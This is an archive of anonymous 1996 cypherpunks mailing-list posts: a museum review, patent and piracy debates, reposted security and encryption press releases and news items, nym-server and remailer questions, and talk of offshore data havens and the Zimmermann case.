Hi all,
If you've never heard of the National Cryptologic Museum and have an
interest in this kind of stuff, you MUST go take a look.  It's at Fort
Meade, outside Laurel, Maryland, and actually lies on the grounds of the
NSA. I dropped by the other day and was very impressed.  The NSA is to be
grudgingly %^) commended, although the material on recent operations
(post-1950) is understandably a little thin.
The very coolest exhibit is a functioning Enigma machine on which visitors
are allowed to encrypt/decrypt messages. It really does work well, and I
got the same gloating thrill I felt the first time I decrypted a PGP
message from a friend. There is also a piece of Gary Powers' U2, a Cray
X-MP processor that you can sit on and peer into, several specimens of old
Japanese crypto machines, and incontrovertible proof of the Rosenbergs'
perfidy and treason, among many other interesting displays.  The staff is friendly and informative, but you will not get the current
key codes for ICBM launch control out of them, of course. I did not see
any mention of PGP or related topics in my brief visit, either. Oh, and
most surreal was the entrance: at the end of the road, an almost unmarked
gate a yard wide in a razor wire fence, dangling a padlock.  I wondered
for a moment if it were the right place and if I would be shot if I
actually went inside.
Allow half a day if you are a serious student of these topics, and an hour
or two if not. All in all, it was the second most interesting museum I saw
in Washington (after Air & Space). I still don't trust Clipper, but it was
certainly nice to see the human side of the big bad spooky NSA. They have
done an important job for the country and don't deserve most of the abuse
that I see heaped on them on the Internet.
Christopher C. May, M.D.
Univ. of Texas Health Sci. Ctr.  San Antonio
may at uthscsa.edu  *  72707.413 at compuserve.com
"Too much Law; not enough Order."

@_date: 1996-02-17 19:35:33
@_author: Anonymous 
@_subject: OECD international crypto policy 
The Feb 9 session of the "Group of Experts" Mr. Gilmore mentions was restricted to official OECD delegations.  See:
     Papers of the open conference on Feb 7 and 8 were promised posting on the Web concurrently but none have yet appeared at:
     Cryptographers Quisquater, Denning and Diffie (and others at the Paris December sessions) were scheduled for Feb 7 and 8. Professor Denning was listed to give "The Future of Cryptography" discussed on cypherpunks a while back.
Perhaps a public-spirited participant will share the fruits of the open and restricted events, as with the Paris gathering.

@_date: 1996-02-18 08:42:57
@_author: Anonymous 
@_subject: Patents suck 
I take some disagreement with that.
With patents, there is a problem of large companies owning them yet
doing nothing with them except suing other companies or individuals.
For example, look at arithmetic coding: there are many patents owned
on it, yet a lot of software using this means of compression may be in
violation of the patents... are the patent-owners publishing software
or makingh efforts to license it widely?  If anything, such patents
are getting in the way of using many algorithms.
Patents would be better if there was a good-faith attempt on the
part of the holder to "use it or lose it".  Somebody sitting on a
patent and doing nothing with it deserves to lose it after a number
of years.

@_date: 1996-02-18 08:53:00
@_author: Anonymous 
@_subject: Cybercrooks 
The Dream of the Internet Becomes Worst Nightmare
Manhasset, N.Y., Feb. 16 -- Technology managers, who
dreamed of the Internet as a new business tool and
championed their cause to senior management, are waking
up to nightmares of security gone awry, reports CMP's
InformationWeek in its February 19 issue.
"The incidence of cybercrook attacks to mine or sabotage
a company's information resources is rising rapidly,"
states Bob Violino, editor-at-large of InformationWeek.
"What is especially alarming is that despite the fact
that companies like Rockwell International and Merrill
Lynch and various government agencies employ the latest
firewall and encryption technology available, they are
experiencing security breaches on a regular basis."
Business users have been particularly skittish about the
Internet since last September, when two computer science
students at the University of California at Berkeley
cracked the public-key encryption code used by Netscape
Communications Corp.'s popular browser software.
"There are more experts than ever in the intruder
community who know the infrastructure of the Internet,"
explains Cathy Fithen, CERT's team leader of strategic
incident response.  "In the past we saw people breaking
into systems using passwords.  Now they look for flaws to
exploit involving networking protocols and source codes
for operating systems."
The fear of invasion is well founded, according to
federal law enforcement agencies, which have stepped up
their investigations of online intrusions.  "We're aware
that this is a serious problem for any industry using the
Internet," says Jim Freeman, special agent in charge of
the FBI's San Francisco office.
"Salvation from the government, or from vendors with new
security products, seems unlikely," says Violino.
"History shows that as soon as new security tools are
developed, hackers learn to crack them.  And while not
every company possesses trade secrets, security is still
a must for everyone in business.  For now, at least,
absolute security is one thing the Net can't offer."
But, companies are so focused on Internet intrusions from
outsiders that they often fail to consider the
possibility of an inside hacker.  According to John
Reinke, chief information security architect at Merrill
Lynch & Co., Inc. in New York, "There is no modern large
organization that I now of that does internal firewalls."
At Bell Laboratories, where an internal network links
some 300,000 host computers around the world, security is
a constant concern. "We're bigger than the entire
Internet was in the late 1980s," says Bill Cheswick,
technical staff manager at the labs' computer science
research department in Murray Hill, N.J.  "Our firewall
keeps the bad guys out but you can't say there aren't bad
guys inside the company."

@_date: 1996-02-19 08:04:00
@_author: Anonymous 
@_subject: Piracy Bests ITAR 
The Economist, 17 Feb 1995, p. 17.
Should foreigners' intellectual property always be
protected? [Excerpts]
Is it right to expect governments, especially poor ones,
to honour new World Trade Organization rules on
intellectual property?
Some economists have made a good case that slack
enforcement of such rules may sometimes do little harm.
Local firms benefit by acquiring pirated technology more
cheaply than the real thing; consumers acquire affordable
high-tech products and close copies of branded goods.
Although the original producers of the intellectual
property lose out, it is sometimes hard to tell how much.
They might anyway have sold nothing in a poor country at
rich prices. And provided that counterfeiters make
reasonably faithful copies, piracy is free publicity: how
many Chinese would know about Microsoft's latest
programs, or listen to Michael Jackson's new album, had
they not been able to buy illegal imitations? ...
It is not always obvious what theft is. Much in patent
and copyright law is arbitrary. But who says American
copyright law is correct? More to the point, why should
China accept America's view of how a drug design, say,
should be accorded patent protection?
In some cases, the interests of rich and poor countries
are clearly at odds: one side has all the property. There
seems to be no objective standard to appeal to.
Eventually, this may change: as poor countries produce
more innovations themselves, their own inventors will
demand greater protection. Meanwhile, the lot of many
intellectual-property producers will not be a happy one.

@_date: 1996-02-19 08:26:52
@_author: Anonymous 
@_subject: patents suck 
Bullshit. Corporations do not work; their employees do. The
creativity of employees is sat upon as net worth, but nothing
is produced.  Money is only worth something if it is circulating
in an economy; a corporation only has worth if it produces
Instead corporations produce nothing.  They sit on resources,
preventing anyone else from producing, because the current system
favors non-production and an inflationary and wasteful economy
based on speculation.
Economic equivalent of people who sit around and talk but don't
get off their asses and do something.
No, they are not fundamental anything. They are taken for granted
in the modern West as a rationale. It's a nice one, and I don't
have too many arguments... except when people claim a false
dilemma of either total private property or total socialism.
Why not a form of property based on use?  If you don't use your
property, after a while you cease owning it.  It was originally
a rationale in Europe and early American colonies because so
many people claimed to own land that they never saw, despire the
fact that natives and settlers lived there.
Extended to patents... corporations do a lot of R but no D, but
legally no one else can make use of it either.  Unisys didn't
market LZW compression and let everyone else use it... then they
decided they should have been making losts of mulah and wanted
to pull the plug and get royalities.  IBM has done negligable
production on arithmetic coding, so a lot of independ developers
ignore the patents.  Similar arguments can be made about PK
Huh? What does that have to do with this argument?

@_date: 1996-02-20 02:38:07
@_author: Anonymous 
@_subject: Assassination Biz 
Hey, Jim Bell, here are some clients, or competitors, or best, The Hit Men (Newsweek, Feb 26, 96)
Call it "in-your-face-capitalism." You lose your job, your ex-
employer's stock price rises, the CEO gets a fat raise. Today,
the more people a company fires, the more Wall Street loves
it, the higher its stock price goes.
Cheer up, you're serving the greater good by being blown away
by what economist Joseph Schumpeter christened "the gale of
creative destruction."
The world is changing and no matter how big and rich a company
is, it has to adapt or die. But Wall Street and Big Business
have made a bad problem worse by being greedheads. Lots of
CEOs have messed up big time. They let payrolls get bloated.
Then to recoup, the offer up employees as sacrifices to
Mammon, god of Wall Street, hoping to get their stock price
back up. When the price rises, it's like Wall Street spitting
on the victim's bodies.
Corporate heads, salaries and layoffs:
Robert Allen, AT&T. Salary: $3,362,000, 40,000 layoffs.
Louis Gerstner, IBM, $2,625,000, 60,000.
Robert Palmer, Digital Equipment, $900,016, 20,000.
Walter Shipley, Chemical/Chase, $2,496,154, 12,000.
Charles Lee, GTE. $2,004,115, 17,000.
Ronald Allen, Delta Air Lines, $475,000, 15,000.
John McDonnell, McDonnell Douglas, $577,791, 17,000.
Robert Stempel, General Motors, $1,000,000, 74,000.
Edward Brennan, Sears, Roebuck, $3,075,000, 50,000.
Michael Miles, Philip Morris, $1,000,000, 14,000.
Frank Shrontz, Boeing, $1,420,935, 28,000.
William Ferguson, CEO Nynex, $800,000, 16,800.
Albert Dunlap, Scott Paper. $100,000,000 in salary, stock
profits and other perks, 11,000.

@_date: 1996-02-20 16:01:58
@_author: Anonymous 
@_subject: should we use same nym on multiple servers? 
With the additional nym servers coming on the scene comes the question of whether or not to "claim" our alpha.c2 nym on the other ones, too.  E.g., if we are foobar at alpha.c2.org, should we also become foobar at nym.gondolin.org and foobar at nym.alias.net, too?
  That would let us have a very stable nym, and prevent confusion over who's "who" if someone else were to have the same id with another nym server.  But, it makes it harder to keep our real ID secret.  (E.g., an oversimplified scenario would be if an attacker sends a message to all three nyms, then watches three PGP conventionally encrypted messages arrive in our mailbox.)
  A "safer" way would be to have the other two nyms have a fake address, but then we couldn't receive mail with it.  A trickier way would be to have the reply block point to alt.anonymous, but then we'd have to constantly be watching for a message "to" us.
  Another angle, though, is that the nym servers may be unstable, and multiple nyms would allow us to post, if out "favorite" is down.
  Anyways, I'm a beginner, and think that the most useful use of remailers is to ask dumb questions.  :-)

@_date: 1996-02-21 11:34:37
@_author: Anonymous 
@_subject: No Subject 
On Mon, 19 Feb 1996 06:50:11 -0800, Raph Levien  What does it mean if a certain remailer is *not* shown on the current list?  Is it down?  Or simply not tested?

@_date: 1996-02-24 13:00:29
@_author: Anonymous 
@_subject: Digital Watermark 
Financial Times, 22 Feb 96
Digital watermark protects copyright
Scientists at the NEC Research Institute in Princeton
believe they have developed "a fundamental enabling
technology" for protecting the copyright of images and
music on the Internet.
They have developed a secure method of producing a
digital watermark, an invisible code that identifies the
owner, which is permanently embedded in the multimedia
Attempts to remove the watermark would be virtually
impossible without degrading the image quality. Moreover,
counterfeiting would be almost impossible, says NEC. the
Japanese electronics company.
The digital watermark is designed to be used in
conjunction with cryptography, which limits access to
encrypted data to legitimate users.
NEC Research Institute:
US, tel 609-520-1555
fax 609-951-2481.

@_date: 1996-02-26 02:04:16
@_author: Anonymous 
@_subject: White House Not Decent 
(Reprinted without permission from the Seattle Times
Personal Technology section)
                 White House Site Blocked
Add the White House to the Internet's extensive list of dens of
Surfwatch, a widely used software program that prevents access
to, and downloading of, sexually explicit material on the
Internet, accidently blocked access to the White House home page
recently - all because a "White House for Kids" Web site address
contained the word "couples."
That's a dirty word in the Surfwatch universe because many
sexually explicit online sites use it as part of their come-on.
In this case, "couples" merely referred to the Executive Branch
tandems of President and Hillary Rodham Clinton and Al and Tipper
Surfwatch fixed the problem within hours, although some might
still find the site offensive.
For political reasons, that is.

@_date: 1996-03-01 04:07:26
@_author: Anonymous 
@_subject: Top Spy Hawks GAK 
Admiral William O. Studeman Accepts Position on Premenos
Board of Directors
Concord, Calif., 28 Feb 1996 -- Premenos Technology
Corp., a leading provider of electronic data interchange
(EDI) software solutions for electronic commerce
applications, today announced the election of Admiral
William O. Studeman, U.S. Navy-retired, to its Board of
Directors effective immediately. Studeman will also act
as consultant on special projects including security and
encryption issues.
Admiral Studeman, age 56, is the former Deputy Director
of Central Intelligence and served for five months in
1995 as the acting Director of Central Intelligence. He
retired from the Navy in October 1995. Prior to his
assignment at the Central Intelligence Agency (CIA),
Studeman was the Director of the National Security Agency
(NSA), and before that was the Director of Naval
In these positions, Studeman was involved in attempting
to develop public policies and technologies that
addressed the complex and often conflicting issues of
enhanced economic competitiveness, law enforcement's
warranted requirement for information transparency in
pursuit of criminal investigations, national security
interest in combating potential information warfare
threats, and the country's overall increased need for
enhanced protection of its information-related systems
and applications.
In commenting on his election to the Board of Premenos,
Studeman stated that "Premenos is not only a leader in
facilitating the promising future of electronic commerce,
it is the first company in the marketplace with a product
line for enhanced protection, security and integrity for
the Internet and other electronic communications-related
business transactions."
Studeman added, "In working with Lew Jenkins and others
in the company, I have an opportunity to better frame the
government-industry dialogue and define the
infrastructure, standards, regulatory, technical and
other directional factors which must be addressed for
electronic commerce -- a rapidly evolving industry
segment so fundamental to the future of the American
lifestyle and national security."
Lew Jenkins, chairman and founder of Premenos said, "The
infrastructure for moving critical business data over the
Internet is crucial to the success of electronic
commerce. We welcome Admiral Studeman to our team and
look forward to his help in developing a trusted model
for the electronic commerce market and establishing a
solid infrastructure similar to the stringent military
requirements that have been in place for decades."
About Premenos Corp.
Premenos is setting the agenda for electronic commerce
and EDI through open networks such as the Internet. Premenos EDI software is an enabling strategy for
transforming how corporations conduct business in
extended enterprises using electronic communications.
Templar -- a suite of software and services that enable
businesses to send and receive EDI documents securely and
reliably over the Internet -- was awarded the EMA '95
Electronic Commerce Product Excellence Award recognizing
the most innovative new product debuted at EMA's annual
Premenos products support the IBM AS/400, RISC
System/6000, HP 9000, SunSparc, Windows 3.x, NT and
Windows 95. Premenos has a worldwide presence with sales
offices in California, London and Paris.
Contact Premenos World Wide Web (WWW) home page at
 to access over 3000 pages of
information on electronic commerce, EDI, standards, as
well as Premenos corporate information materials.

@_date: 1996-03-01 14:16:12
@_author: Anonymous 
@_subject: SAIC Offers SET 
SAIC Is  for Secure Electronic Transactions
on the Internet
San Diego, 29 Feb 1996 -- Science Applications
International Corp. (SAIC), a leading provider of
information and network security services, today
announced that it will offer a wide range of business
solutions based on the new Secure Electronic Transactions
(SET) standard for safeguarding bankcard purchases over
the Internet.
Through its  business unit, SAIC will provide
consulting, integration and digital certification
services to financial institutions, network operators and
merchants doing business over open networks.
SAIC helped Visa and Microsoft in their pioneering effort
to bring security to on-line commerce, and played a major
role in crafting the SET standard, working for Visa and
in close association with MasterCard and other SET
technology partners.
SAIC has long been one of the largest and most trusted
suppliers of information, network and data security
solutions in the world, as well as being a major
information systems integrator for government and
commercial clients.
"We're bringing these skills, and our understanding
of SET complexities such as digital signatures, public
key cryptography, certificate management and network
protocols together to help businesses transition smoothly
into the world of electronic commerce," said Nick
DiGiacomo, who oversees   "What we offer is
seamless integration from the cardholder's computer over
the networks to the merchants and banks, and back again. We're here to make this easy."

@_date: 1996-01-02 17:16:47
@_author: Anonymous 
@_subject: Guerilla Internet Service Providers 
On 1/1/96 at 3:11 pm Lucky Green replied to Andreas Bogk about:
What about using converted freighters offshore in international waters
for storing the computers? i.e. Sameer the Wolfman Jack of Pirate Internet Services (tm)  I was told that Belize is offering passports for the next two years for $50,000 and that might be even less if offers were made to the government to provide low cost Internet access to the citizens of Belize.
Belize has always been known as a home for pirates, A wonderful Cypherpunk
candidate for an offshore data haven!
L. Malthus

@_date: 1996-01-03 15:00:11
@_author: Anonymous 
@_subject: No Subject 
Cypherpunks write code. With that phrase and the wave of attempts to censor the 'Net, I've embarked on a quest to make remailers easier to use.
Has anyone written an easy to use Windows or DOS application that will let
someone chain a message through several remailers, perhaps with support
for the mailer at alpha.c2.org? Would the writer of such a program, if in the US fall under the provisions
in ITAR? Obviously, calls to the PGP program would have to be made. I
recall reading that such hooks do fall under the ITAR. If this is true, so
much for a more user friendly version of chain for the masses.

@_date: 1996-01-03 16:24:22
@_author: Anonymous 
@_subject: Why Net Censorship Doesn't Work 
Ed Carp:
   Definitely. The number of warm and well-fed people who are willing to
lecture the cold and starving on morals and higher principles is

@_date: 1996-01-04 04:11:27
@_author: Anonymous 
@_subject: Compuserve *hasn't* banned newsgroups 
Duncan Frissell 1/3/96 1:02 PM:
   CIS refugees aren't the only people who use or need free NNTP servers:
   Sound familiar?

@_date: 1996-01-04 05:50:31
@_author: Anonymous 
@_subject: Compuserve *hasn't* banned newsgroups 
Vincent Cate, 1/3/96 10:41 AM:
   If you do this, you'll find out very quickly just how empty (or at
least how slippery) slogans like "the Internet routes around censorship"
are: if your efforts pay off and you steer even a fraction of CIS's
traffic toward the remaining open newsservers, they'll close faster than
you can say "alt." So before you do it, think about how the net will route
around sysops closing their servers off from the net.

@_date: 1996-01-04 22:53:38
@_author: Anonymous 
@_subject: \"Concryption\" 
Cambridge, MA, Jan 3 -- Security Dynamics plans to
license "Concryption," a just patented technology
combining encryption and compression, to outside
companies for use with a variety of security and
compression protocols, revealed Kenneth Weiss, chairman
and chief technical officer.  "It is my belief that Concryption will solve the two
biggest problems that exist today: the need for privacy
and more available bandwidth," Weiss said.  "Compression has been catching on. It takes less time
today to send a whole page of fax than it used to, for
example, and part of that is because of better data
compression. But encryption has not caught on in the way
it should, because of time and expense issues and the
hassles of key management."  Still, though, available bandwidth for data storage and
transmission is diminishing all the time, in arenas
ranging from fax to satellite technology, networked
information, and the World Wide Web, according to the
company chairman.  Compression will become an even more significant
requirement in the future, with an anticipated explosion
of multimedia applications, he predicted.  Security Dynamics has been awarded US Patent No.
5,479,512 for Concryption. The Cambridge,
Massachusetts-based company now holds a total of 14
patents from the US Patent Office, most related to its
"core business" of computer security, he reported.  One of the company's other patents, for instance, is for
a biometric technology designed to enable "voice
fingerprinting." Security Dynamics also produces the
SecureID Card, ACE/Server, and ACM series of user
authentication products.  Security Dynamics' newly patented Concryption technology
is based on mathematical synergies between the processes
of encrypting and compressing data. Both procedures call
for analyzing arrays of binary patterns, "seeing where
the spaces are," and then applying rules to the data.  Weiss added that encryption and compression are both
highly intensive in terms of CPU (central processor unit)
cycles and disk accesses. As a result, he asserted,
integrating the two technologies into a "single set of
operations" will bring cost reductions in CPU usage as
well as faster encryption times.  "The time to compress might increase a little bit, but on
the other hand, the time to encrypt goes to zero.
Whatever the disk accesses are for compression, there
would be no other disk accesses for encryption."  Security Dynamics sees Concryption as a "concept pattern"
suited to use with a variety of data types, network
transports, and security protocols, according to Weiss.
"This is a new enabling technology that we believe should
have an impact on the way information is communicated in
the future."  The company intends to work with outside licensees on
integrating different compression and encryption methods.
"Big users have already optimized compression for their
unique technologies. We use a different form of
compression for fax than we would for satellite data or
TV pictures. Beyond that, companies might employ
different compression algorithms. Similarly, people like
to have control over the type of encryption used," Weiss
maintained.  Although forthcoming multimedia applications will require
much greater compression than text, conventional needs
for "privacy" may not be as high, since many video
offerings of the future will be geared to entertainment,
Weiss acknowledged.  "But we will probably be seeing 'economic privacy,' " the
company chairman noted, pointing to a trend, already well
established in the cable TV industry, toward providing
"high demand" fare such as first-run movies only on
separately priced, encrypted, "premium channels."  Contact: Security Dynamics, 617-547-7820

@_date: 1996-01-05 01:42:27
@_author: Anonymous 
@_subject: Guerilla Internet Service Providers 
Belize is a shit hole that is as willing as many other slimeball countries to deny someone entry and force them kicking and screaming onto the next flight to the U.S. on request from U.S. authorities. In principle, that is kidnaping. They use the technicality that the person never entered their territory. No- man's lands of port zones where the most basic rights may be violated without regard to a country's constitution are another class of abuse that will have to go.
Belize is also the place where Bob White, publisher of The Duck Book and sponsor of some of the largest hard-money conferences ever held, was murdered.  The usual suspects were not even rounded up.
Someone once wrote that the principle cash crop of Belize is lice. In reality it may be principles. At least the Hondurans got angry when a citizen was kidnaped by the U.S.
We Jurgar Din
(that will have to suffice: I do not yet live in a free country)
+"The battle, Sir, is not to the strong alone. It is to the+
+vigilant, the active, the brave. Besides, Sir, we have no +
+election. If we were base enough to desire it, it is now  +
+too late to retire from the contest." -Patrick Henry 1775 +

@_date: 1996-01-05 02:44:36
@_author: Anonymous 
@_subject: Foiling Traffic Analysis 
Lucky, are you just the cynic's cynic, a farther-gone revolutionary than you seem, or did you just have a bad month?
shamrock at netcom.com (Lucky Green) wrote (on various occasions):

@_date: 1996-01-05 02:46:40
@_author: Anonymous 
@_subject: Guerilla Internet Service Providers 
Why shouldn't they?
What does a hotel do, if not act as a local communication
concentrator for guests? What about multi-company PBX
installations? Most PBX's have for years supported the
facility to handle entirely separate groups of trunks, often
called "tenants." This facility is used in shared-receptionist,
shared-PBX scenarios. Each incoming trunk call identifies the
"tenant" or company to which the call is addressed, so the
receptionist may answer appropriately. I even seem to vaguely
remember hearing of apartments or co-ops that use a PBX
instead of having direct subscriber lines to each apartment. Aggregation of communication facilities within the boundaries
of public rights of way seems to be a long-standing practice,
at least in the voice field. Voice and data are increasingly
indistinguishable, the latest move in that direction being the
practice of supporting a PBX with all-ISDN trunks.
I have to think there is something in the way you have gone
about it that leaves you with a defect in the kinds of
recourse any of the above examples would have and would not hesitate to use.
Maybe you should organize the effort in some formal manner. Some states allow legal standing for unincorporated associations. Maybe a cooperative? Maybe (shudder) a Far enough off the ground to make it interesting. 800 lbs
makes a satisfying crunch when it hits the ground. Maybe if
you poke around you can find a few dozen other groups in
similar situations, and make it far more expensive for the
telco to harrass you than to deliver service as it is supposed
to do.
We Jurgar Din
(that will have to suffice: I do not yet live in a free country)
+"The battle, Sir, is not to the strong alone. It is to the+
+vigilant, the active, the brave. Besides, Sir, we have no +
+election. If we were base enough to desire it, it is now  +
+too late to retire from the contest." -Patrick Henry 1775 +

@_date: 1996-01-05 02:59:57
@_author: Anonymous 
@_subject: Duplicate messages 
On  4 Jan 96 at 7:00, Dr. Dimitri Vulis wrote (to Ed Carp):
I find it to be less work to scan messages marked for deletion by the Cohen/Alice/Hallam/Vulis/Nuri filter for the occasional meaningful one than to have to scan the main body of messages to delete the meaningless ones.
We Jurgar Din
(that will have to suffice: I do not yet live in a free country)
+"The battle, Sir, is not to the strong alone. It is to the+
+vigilant, the active, the brave. Besides, Sir, we have no +
+election. If we were base enough to desire it, it is now  +
+too late to retire from the contest." -Patrick Henry 1775 +

@_date: 1996-01-07 08:42:48
@_author: Anonymous 
@_subject: please stop the Mitnick stuff 
C'mon, Perry, give it a break.  Mitnick's case has to do with security
issues as well as the violations of privacy and/or search and seizure
the government used to arrest him.
It may not be cryptography per se, but are you going to seriously argue
that security, etc. is not encompassed in crypto issues?
I found it interesting.  If you didn't, then all you had to do was
delete it.  No one needs to read your personal crusade as *The One*
who tells us what's relevant and what's not.

@_date: 1996-01-09 07:59:32
@_author: Anonymous 
@_subject: phone calls from hell 
8 Jan 1996
Jerusalem, (Reuter) - The head of Israel's Shin Bet
resigned Monday just three days after the killing of a
wanted Palestinian bombmaker recovered some of the damage
the secret service suffered from the assassination of
Yitzhak Rabin.
The man, identified by his initial "kaf," remains in
office until a successor is appointed, Israel Radio said.
His predecessor, Yaacov Peri, is now president of one of
Israel's two cellular telephone networks.  8 Jan 1996
Jerusalem (AP) -- The booby-trapped cellular phone that
killed an Islamic militant was delivered by a longtime
informer for Israel who was paid $1 million for helping,
media reports said Monday. A fugitive for three years, Ayyash was hiding in the home
of Osama Hamad, his friend from college days.  Hamad said
he warned Ayyash in the summer that his uncle, Kamal
Hamad, may be an informer for Israel.  Hamad said his uncle gave him a cellular phone so he
could be found easily.  A day before Ayyash was killed, his uncle asked for the cellular phone, took it and returned it later, requesting
that it be kept on at all times, Hamad said.  Israel's security services apparently deceived Kamal
Hamad, telling him they had planted a bug in the phone,
rather than explosives, the radio said.  Media reports said that the explosion was set off by
remote control when Ayyash answered a call to him. It is
not known how the identity of Ayyash was ascertained.

@_date: 1996-01-09 10:04:07
@_author: Anonymous 
@_subject: NSA Rigs Win NT to B 
Global Internet Wins NSA Contract for Windows NT Security
Feasibility Study to Analyze B-Level Security
Palo Alto, Calif., Jan. 8 -- Global Internet today
announced that the National Security Agency has awarded
them a contract to conduct a feasibility study on raising
the security level of Windows NT 3.51 to B-level.  Global
Internet will analyze Windows NT's ability to meet
B-level security requirements, as well as develop a
software prototype that demonstrates a Fortezza-based
cryptocard access control mechanism.
The contract was granted by the NSA under the Multilevel
Information System Security Initiative (MISSI), which has
the charter to provide security services for information
ranging from Unclassified but Sensitive up to and
including Top Secret.  Windows NT was originally designed
with security in mind.  A NSA evaluation team has
determined that Windows NT 3.5 with Service Pack 3
satisfies all class C-2 security requirements.  B-level
of security strengthens the C2 level security features
while providing stricter system assurances.
Global Internet has a proven expertise with Windows NT. Centri TNT is the only network security solution that is
fully integrated into Windows NT TCP/IP networks by
complementing and extending Windows NT's inherent
strengths, while maintaining 100% compatibility with
existing applications.  Global Internet also has
extensive experience architecting, designing and
developing high level secure operating systems.
"This project addresses anticipated security requirements
for DOD, as well as commercial customers using Windows
NT," said Michelle Ruppel, a director of the Global
Internet Software Group.  "Our analysis will address
compatibility issues with B-level security requirements
and identify the changes necessary to provide this level
of support."
According to Outlink, Inc., a New York-based research and
publishing firm focusing on the information security
market, about 80% of the PC hardware market supports
Microsoft's DOS and Windows 3.1.  This combination,
though popular, does not provide inherent security
features such as secure login, access control, auditing
and self-protection. Strong access control is a highly
desirable function of the MISSI architecture.  Trusted
Operating Systems will play a role in the MISSI success.
Windows NT is a modular OS and combined with its current
security features that are based on the Trusted Products
Evaluation Program (TPEP) C2 level of security and it's
ability to operate on the majority of customer platforms
while supporting DOS and Windows applications, the
architecture lends itself to support B-level
An operating system with few security features allows
anyone to use the machine without validating their
identity, while allowing access to all files, objects and
resources.  C2 level security includes: auditing to allow
security-relevant events to be recorded and monitored,
discretionary (need-to-know) access controls to mediate
who can access (read or write) files and other objects
and identification and authentication (login) to require
users to identify themselves to the system before they
are allowed to use the system.
B-level security additionally includes: labeling of
users, files and other objects with a sensitivity label,
mandatory access controls to enforce a security policy
based on the labels of the users and objects and trusted
path that ensures users they are using the actual
programs provided with the system.
The Global Internet Software Group specializes in
security software for Windows NT networks and other
operating environments.  The Software Group is a division
of Global Internet, a full-service internetworking
solutions company focusing on secure, reliable
internetworking software and services.  Located in Palo
Alto, California, Global Internet is privately held and
was founded in 1993.  Global Internet Home Page:

@_date: 1996-01-10 04:43:45
@_author: Anonymous 
@_subject: PRIVACY: Private traces in public places 
Responding to msg by tcmay at got.net (Timothy C. May) on Wed, 10 Jan  0:9  AM
    Last summer the first case in Britain of a libel on the Internet was
   settled out of court when Laurence Godfrey accepted    damages from another nuclear physicist, Philip Hallam-Baker,    remarks made in 1993 on Usenet, an electronic conference with 16
   million users. And Peter Lilley, the Social Security Secretary, sent a
   stiff letter to the vice-chancellor of Leeds University after one of
   its students used a faculty computer to make defamatory    about him.

@_date: 1996-01-10 09:13:44
@_author: Anonymous 
@_subject: Sci-Atlanta Uses RSA 
Scientific-Atlanta Announces Development of PowerKEY
Conditional Access System Using RSA 'Public Key'
Encryption Techniques
PowerKEY System Will Provide Sophisticated Security For
Signal Content, Interactive Messaging and Electronic
S-A Becomes First Digital Set-Top Terminal Provider To
Use Patented RSA Algorithms
Atlanta, Jan. 9 -- Scientific-Atlanta, Inc. announced
today that it has licensed advanced encryption technology
from RSA Data Security, Inc. to be included in its
PowerKEY(TM) digital conditional access system, which is
being developed for use in set-top terminals, headend
components, cable modems and network element management
The system will combine public key and secret key
cryptographic methods in physically secure
implementations to provide a high-performance security
solution for broadband networks.
Sophisticated conditional access systems allow cable and
other broadband network operators to be more flexible in
implementing new services that employ easy-to-use
security.  For example, both content providers and
network operators can have their own secure way to
protect content and communicate interactively with
subscribers.  Theft of services, falsified orders, and
vandalism of software and databases can be curtailed. Sensitive information, such as credit card numbers, can
be encrypted and exchanged.  In addition, the identity of
the sender and the message content can be authenticated

@_date: 1996-01-10 09:14:08
@_author: Anonymous 
@_subject: Sci-Atlanta Uses Cylink 
Scientific-Atlanta Licenses Cylink's Security Techniques
for Digital Broadband Application
First Use of Patented Cylink Public Key Methods by a
Digital Set-Top Terminal Supplier for Two-Way Message
Encryption, Decryption and Authentication
Atlanta, Jan. 9 -- Scientific-Atlanta, Inc. announced
today the licensing from Cylink Corporation of
communications security techniques for use by cable and
other broadband television systems.
Cylink, a provider of enterprise-wide network information
security products and wireless communications, has
licensed to Scientific-Atlanta what are known as the
"Stanford patents," which cover the field of public key
cryptography, a security technique that ensures privacy,
authentication and integrity of electronic information.
The license gives Scientific-Atlanta the right to
practice public key cryptography methods, as defined in
certain intellectual property holdings of Cylink.  These
include methods for generation, authentication and
exchange of "public keys" used in securely communicating
point-to-point network messages.  Scientific-Atlanta
plans to use these cryptography techniques in its
development of a conditional access system for digital
networks -- including set-top terminals, headend
components, and network element management software -- to
improve communications security for digital pay-per-view,
cable modems and other broadcast and interactive
The license is the first that Cylink has granted to a
set-top terminal manufacturer of its patented
cryptographic techniques.  No other terms were disclosed.
With sophisticated encryption systems, cable and other
broadband network operators can be more flexible in
implementing new services that employ easy-to-use
security.  For example, both content providers and the
network operator can have a secure way of interactive
communications with subscribers.  Sensitive information,
such as credit card numbers, can be encrypted and
exchanged. The identity of the sender and the message
content can be authenticated -- an important capability
for multi-provider authorization environments and for
validation of orders from subscribers.
A public key-based cryptography system controls the
encryption and decryption of messages.  Each user is
assigned two unique mathematically-related keys: a
published public key, and a secret private key.  In a
cable TV environment, the public key for each
subscriber's set-top terminal can be distributed or
"published" while keeping the private key in secure
"We're excited about the opportunities this license opens
for content providers and network operators," said Bob
Van Orden, Scientific-Atlanta's product line director of
digital subscriber systems.  "With Cylink's innovations,
we have the foundation necessary for designing very
advanced security into any digital broadband application,
including pay-per-view, cable modems and electronic
"Through the use of public key technologies, Scientific-
Atlanta will help network operators to protect the value
of their services," said David Morris, vice president of
marketing for Cylink.  "This is a vitally important step
for operators as they migrate to digital networks."
Scientific-Atlanta, Inc. ( is a
leading supplier of broadband communications systems,
satellite-based video, voice and data communications
networks and worldwide customer service and support.  The
company is the Official Broadband Video Distribution
Sponsor of the 1996 Olympic Games in Atlanta, Georgia.

@_date: 1996-01-13 06:47:44
@_author: Anonymous 
@_subject: Zimmermann case is dropped. 
My sentiments  exactly.  I tend to disbelieve in
coincidences.  Rather, I found the timing of dropping the investigation
of PRZ and the anticipated release of version 3.0 extremely interesting.
One might conclude that their attitude was: "Let's throw this fish back
and aim for a 'keeper'.

@_date: 1996-01-13 14:56:51
@_author: Anonymous 
@_subject: Zimmermann case is dropped. 
...and I'm sure they'll be watching VERY closely to see how
version 3.0 will be distributed....

@_date: 1996-01-13 19:28:37
@_author: Anonymous 
@_subject: DEC AltaVista Closer To Commercialization  [NOISE] 
